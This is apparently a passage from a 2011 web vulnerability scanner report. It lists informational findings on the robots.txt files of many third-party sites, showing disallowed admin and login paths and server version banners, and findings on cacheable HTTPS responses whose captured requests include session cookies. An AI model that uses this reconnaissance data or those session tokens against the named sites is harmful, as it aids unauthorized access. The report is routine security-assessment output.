Host: www.walthers.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:06 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 17:54:29 GMT
ETag: "1b60b4b-19f-491e25a367f40"
Accept-Ranges: bytes
Content-Length: 415
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 20
Disallow: /exec/cart
Disallow: /exec/checkout
Disallow: /exec/checkout1
Disallow: /exec/checkout2
Disallow: /exec/checkout3
Disallow: /exec/contest
Disallow: /exec/guestb
...[SNIP]...
30.451. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 23:10:56 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=547
Date: Sun, 01 May 2011 23:32:53 GMT
Content-Length: 1142
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...
30.452. http://www.wcpss.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wcpss.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wcpss.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8a DAV/2 PHP/5.2.9 mod_fastcgi/2.4.6 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 14 May 2009 19:13:26 GMT
ETag: "42746-179-469e41f558180"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/plain

#this controls robot access to the site

User-agent: *
Disallow: /web-guidelines/ # Internal use only
Disallow: /school_sites_info/ # Internal use only
Disallow: /drop_box/
Disallow: /curriculum-instr
...[SNIP]...
30.453. http://www.webme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webme.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webme.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:23 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 12:07:09 GMT
ETag: "8a6c9-19-486647b389540"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-15

User-Agent: *
Allow: /


30.454. http://www.webstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webstore.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Feb 2011 23:58:10 GMT
ETag: "138343-176-49c5aefbd6880"
Accept-Ranges: bytes
Content-Length: 374
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.webstore.com/sitemap.xml
Disallow: /login.php
Disallow: /register.php
Disallow: /contact_us
Disallow: /buy_out
Disallow: /*item_watch*
Disallow: /*help$
Disallow: /su
...[SNIP]...
30.455. http://www.weedsthatplease.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weedsthatplease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weedsthatplease.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:03:41 GMT
Server: Apache
Last-Modified: Sat, 10 Feb 2007 03:41:28 GMT
ETag: "8480141-49-429170d1f8a00"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /Secure/
Disallow: /scripts/
30.456. http://www.westjet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.westjet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.westjet.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 23 Nov 2010 22:33:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=41673
Expires: Mon, 02 May 2011 10:48:36 GMT
Date: Sun, 01 May 2011 23:14:03 GMT
Content-Length: 452
Connection: close

User-agent: *
Disallow: /agent/
Disallow: /akamai/
Disallow: /analytics/
Disallow: /campaigns/
Disallow: /common/
Disallow: /corporate/
Disallow: /css/
Disallow: /data/
Disallow: /flash/
Dis
...[SNIP]...
30.457. http://www.whiskeyclips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whiskeyclips.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whiskeyclips.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:37 GMT
Server: Apache
Last-Modified: Sat, 18 Sep 2010 19:30:47 GMT
ETag: "bfea35-17-4c951367"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.458. http://www.whosampled.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whosampled.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whosampled.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:33:24 GMT
Content-Type: text/plain
Content-Length: 84
Last-Modified: Mon, 17 Jan 2011 20:25:25 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /buy/
Disallow: /share/
Disallow: /contact/
Disallow: /add/
30.459. http://www.wirelessadvisor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wirelessadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wirelessadvisor.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:40:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "631-4bbe6841-2df2062"
Last-Modified: Thu, 08 Apr 2010 23:35:29 GMT
Content-Type: text/plain
Content-Length: 1585

# $Id: robots.txt 898 2010-03-04 17:39:00Z elmuerte $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like
...[SNIP]...
30.460. http://www.wmms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wmms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wmms.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4122067365
X-Cache-Server: varnish03
Expires: Sun, 01 May 2011 23:29:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:29:33 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...
30.461. http://www.womansdivorce.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womansdivorce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.womansdivorce.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:53 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.womansdivorce.com/ldKhiLCb.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
D
...[SNIP]...
30.462. http://www.worldnewstwo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldnewstwo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldnewstwo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 17 Jul 2010 02:12:21 GMT
ETag: "25f87c1-18-48b8bdd93ab40"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.463. http://www.worldtvpc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worldtvpc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.worldtvpc.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 06 Feb 2010 15:11:00 GMT
ETag: "ec0059-17a-47eeff9cba900"
Accept-Ranges: bytes
Content-Length: 378
Cache-Control: max-age=7200, private, must-revalidate
Expires: Mon, 02 May 2011 01:11:42 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

Sitemap: http://www.worldtvpc.com/sitemap.xml
User-agent: *
Disallow: /cgi-bin/
Disallow: /onlinevideosites/go.php
Disallow: /blog/wp-content/cache/
Disallow: /blog/wp-content/themes/
Disallow: /blog/
...[SNIP]...
30.464. http://www.wpsdlocal6.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wpsdlocal6.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wpsdlocal6.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 01 May 2011 23:11:28 GMT
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:11:28 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0
X-N: S

User-agent: *
Disallow:/search
Disallow:/searchresults
30.465. http://www.wretch.cc/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wretch.cc
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wretch.cc

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:50:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 22 Apr 2011 11:40:10 GMT
Accept-Ranges: bytes
Content-Length: 81
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 0
Via: HTTP/1.1 r2.ycpi.tp2.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5

User-agent: *
Disallow:

Sitemap: http://www.wretch.cc/sitemap/sitemap_index.xml
30.466. http://www.wsfa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wsfa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wsfa.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Mon, 02 May 2011 00:52:50 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:52:50 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...
30.467. http://www.wtoc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtoc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtoc.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:ac8"
Cteonnt-Length: 818
Expires: Sun, 01 May 2011 23:42:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:42:07 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...
30.468. http://www.wtrf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtrf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtrf.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 19 Nov 2010 15:00:14 GMT
Accept-Ranges: bytes
ETag: "96f36678fa87cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:17 GMT
Connection: close
Content-Length: 396

User-agent: *
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

User-agent: Googlebot
Disallow: /mobile/
Disallow: /admin/
Disallow: /ads/
Disallow: /login.cfm
Allow: /

Us
...[SNIP]...
30.469. http://www.wtuber.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtuber.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wtuber.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1529541469"
Last-Modified: Thu, 15 Jul 2010 18:07:59 GMT
Content-Length: 34
Connection: close
Date: Sun, 01 May 2011 23:46:43 GMT
Server: lighttpd/1.4.26

User-agent: *
Disallow: /jailbait
30.470. http://www.wwmt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wwmt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wwmt.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:18 GMT
Server: Apache
Cache-Control: max-age=86400
Last-Modified: Sun, 01 May 2011 20:57:13 GMT
Expires: Mon, 02 May 2011 20:57:13 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 910
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /common/bc/
Disallow: /common/bc3/
Disallow: /common/gabriels/
Disallow: /common/gsa/
Disallow: /common/printer/
Disallow: /common/pluck/
Disallow: /common/tools/
Disallow: /co
...[SNIP]...
30.471. http://www.xhost.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhost.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xhost.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:58:08 GMT
Server: Apache
Last-Modified: Thu, 15 Apr 2010 08:46:56 GMT
ETag: "270322-3ad-484428979a000"
Accept-Ranges: bytes
Content-Length: 941
Connection: close
Content-Type: text/plain

User-Agent: wget
Disallow: /
User-Agent: sitecheck.internetseer.com
Disallow: /
User-Agent: grub-client
Disallow: /
User-Agent: NPBot
Disallow: /
User-Agent: WebReaper
Disallow: /
User-Agent
...[SNIP]...
30.472. http://www.xilisoft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xilisoft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xilisoft.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.14
Date: Sun, 01 May 2011 23:12:27 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 395
Last-Modified: Mon, 06 Sep 2010 10:13:59 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Allow: /webapp/pay
Disallow: /webapp/
Disallow: /webapp_data/
Disallow: /webapp_template/
Disallow: /downloads/
Disallow: /ipad-magic-pro.html
Disallow: /ipad-magic-mac-pro.html

...[SNIP]...
30.473. http://www.yeahbaby.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yeahbaby.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yeahbaby.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:02:32 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 16 Apr 2008 08:51:51 GMT
ETag: "5408c1-1b-a0be97c0"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *

Disallow:


30.474. http://www.ymlp44.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ymlp44.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ymlp44.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:07 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 09:47:55 GMT
ETag: "18e3bc8-24-4a03ce31308c0"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
30.475. http://www.yorku.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yorku.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yorku.ca

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 18:36:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Thu, 24 Aug 2006 13:52:59 GMT
ETag: "12eab2c-150-44edaf3b"
Accept-Ranges: bytes
Content-Length: 336
Via: 1.0 optera.ccs.yorku.ca
Age: 2163
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /webstats

User-agent: Slurp
Disallow: /finearts/falabel/catalogue

User-agent: *
disallow: /struther/teaching/undergrad/psyc3570p/documents/aOrganizationalPsychologyFinalGrade
...[SNIP]...
30.476. http://www.youneek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youneek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youneek.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:34 GMT
Server: Apache
Content-Length: 176
Cache-Control: public;max-age=78082
Expires: Mon, 02 May 2011 22:01:56 GMT
Last-Modified: Sun, 01 May 2011 22:01:56 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

# This allows robots with any user-agent to hit any part of our site and points them to our sitemap
User-agent: *
Disallow:
Sitemap: http://www.youneek.com/sitemap_index.xml
31. Cacheable HTTPS response  previous  next
There are 13 instances of this issue:

31.1. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getCountries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /AJAXWebServices/geographicServices.asmx/getCountries

Request

POST /AJAXWebServices/geographicServices.asmx/getCountries HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/member/registration.aspx
Origin: https://www.crankyape.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45
Content-Length: 50

{"knownCategoryValues":"","category":"selCountry"}

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 02 May 2011 01:54:19 GMT
Content-Length: 25835
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

{"d":[{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Afghanistan","value":"1","isDefaultValue":false},{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Albania","val
...[SNIP]...
31.2. https://www.crankyape.com/AJAXWebServices/geographicServices.asmx/getStates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /AJAXWebServices/geographicServices.asmx/getStates

Request

POST /AJAXWebServices/geographicServices.asmx/getStates HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/member/registration.aspx
Origin: https://www.crankyape.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45
Content-Length: 61

{"knownCategoryValues":"selCountry:221;","category":"states"}

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 02 May 2011 01:54:22 GMT
Content-Length: 5855
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

{"d":[{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Alabama","value":"181","isDefaultValue":false},{"__type":"AjaxControlToolkit.CascadingDropDownNameValue","name":"Alaska","value"
...[SNIP]...
31.3. https://www.crankyape.com/member/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/

Request

GET /member/ HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 02:10:51 GMT
Content-Length: 6535
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns=
...[SNIP]...
31.4. https://www.crankyape.com/member/registration.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...
31.5. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /Electronicpartsfinder/dealerinfo/DealerInfo.asp

Request

GET /Electronicpartsfinder/dealerinfo/DealerInfo.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:17 GMT
Content-Length: 5101
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>HLSM Electronic Parts Finder.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family
...[SNIP]...
31.6. https://www.onlinemicrofiche.com/WPS/shoppingcart/Shoppingcart/ProcessOrder.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/Shoppingcart/ProcessOrder.asp

Request

GET /WPS/shoppingcart/Shoppingcart/ProcessOrder.asp?Type=12 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=GJJKBIKAIMAAJLOHIEDJOHHE

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:22:10 GMT
Content-Length: 4256
Content-Type: text/html
Cache-control: private


<html><head><title>World of Powersports' Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-f
